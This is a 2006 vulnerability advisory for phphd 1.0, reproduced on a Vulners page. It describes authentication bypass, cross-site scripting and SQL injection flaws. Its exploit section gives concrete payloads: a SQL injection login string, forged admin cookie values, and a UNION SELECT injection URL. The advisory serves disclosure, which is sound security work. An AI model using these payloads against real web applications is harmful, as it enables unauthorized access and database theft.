Vulners
Lucene search
EV0060.txt
🗓️ 14 Feb 2006 00:00:00Reported by Aliaksandr HartsuyeuType 
packetstorm🔗 packetstormsecurity.com👁 29 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2006-0607 | 8 Feb 200623:00 | – | cve |
| CVE-2006-0608 | 8 Feb 200623:00 | – | cve |
| CVE-2006-0609 | 8 Feb 200623:00 | – | cve |
 | CVE-2006-0607 | 8 Feb 200623:00 | – | cvelist |
| CVE-2006-0608 | 8 Feb 200623:00 | – | cvelist |
| CVE-2006-0609 | 8 Feb 200623:00 | – | cvelist |
 | EUVD-2006-0614 | 7 Oct 202500:30 | – | euvd |
| EUVD-2006-0615 | 7 Oct 202500:30 | – | euvd |
| EUVD-2006-0616 | 7 Oct 202500:30 | – | euvd |
 | CVE-2006-0607 | 8 Feb 200623:02 | – | nvd |
10
`New eVuln Advisory:
phphd Multiple Vulnerabilities
http://evuln.com/vulns/60/summary.html
--------------------Summary----------------
eVuln ID: EV0060
CVE: CVE-2006-0607 CVE-2006-0608 CVE-2006-0609
Vendor: Hinton Design
Vendor's Web Site: http://www.hintondesign.org
Software: phphd
Sowtware's Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=91
Versions: 1.0
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
-----------------Description---------------
1. Authentication Bypass
Vulnerable script: check.php
There are two ways to bypass authentication:
a) SQL Injection
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off
b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies
2. Multiple Cross-Site Scripting
Vulnerable script: add.php
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.
3. Multiple SQL Injections
Vulnerable scripts: all scripts showing some data from database
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off
--------------Exploit----------------------
Available at: http://evuln.com/vulns/60/exploit.html
1. Authentication Bypass
a) SQL Injection
url: http://host/ht/login.php
Username: ' or 1/*
Password: any
b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1
Cookie: [email protected]
2. Cross-Site Scripting Example.
Url: http://host/phphd/add.php
Download_name: <XSS>
Version: <XSS>
Download Description: <XSS>
3. SQL Injection Example:
http://host/phphd/view_link.php? file_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Feb 2006 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.01425